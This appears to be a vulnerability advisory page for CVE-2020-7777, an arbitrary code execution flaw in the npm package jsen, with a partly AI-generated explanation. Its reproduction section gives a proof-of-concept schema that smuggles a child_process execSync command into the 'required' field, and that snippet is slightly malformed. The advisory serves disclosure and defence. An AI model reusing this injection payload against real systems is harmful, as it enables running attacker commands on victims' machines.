Arbitrary Code Execution
Description
This affects all versions of package jsen. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention about the risks of untrusted schema files, so I assume that this is applicable. In particular the required field of the schema is not properly sanitized. The resulting string that is build based on the schema definition is then passed to a Function.apply();, leading to an Arbitrary Code Execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
jsennpm | <= 0.6.6 | — |
Affected products
2- jsen/jsendescription
Patches
Vulnerability mechanics
Root cause
"The 'required' field in the schema is not properly sanitized, allowing for arbitrary code execution when processed."
Attack vector
An attacker can control the schema file used by the jsen package. By injecting malicious JavaScript code into the 'required' field of the schema, the attacker can cause arbitrary JavaScript code to be executed on the victim machine when the schema is processed. The module description and README do not warn about the risks of untrusted schema files, making this attack vector more plausible [ref_id=1]. The resulting string is then passed to Function.apply(), leading to code execution [ref_id=2].
Affected code
The vulnerability lies within the jsen package, specifically in how it handles the 'required' field within a schema definition. The code constructs a string based on this field, which is then passed to `Function.apply()`, enabling arbitrary code execution [ref_id=1]. The affected code path is referenced at `lib/jsen.js#L875` [ref_id=1].
What the fix does
The advisory states that there is no fixed version for jsen [ref_id=2]. Therefore, no patch is available to address this vulnerability. Users are advised to avoid using untrusted schema files with the jsen package.
Preconditions
- inputThe attacker must be able to control the schema file that is processed by the jsen package.
Reproduction
const jsen = require('jsen');
let schema = JSON.parse( { "type": "object", "properties": { "username": { "type": "string" } }, "required": ["\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\"" ] }); const validate = jsen(schema); validate({});
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-vm64-cfqx-3698ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2020-7777ghsaADVISORY
- github.com/bugventure/jsen/blob/master/lib/jsen.jsghsaWEB
- github.com/bugventure/jsen/blob/master/lib/jsen.js%23L875mitrex_refsource_MISC
- security.snyk.io/vuln/SNYK-JS-JSEN-1014670ghsaWEB
- snyk.io/vuln/SNYK-JS-JSEN-1014670mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.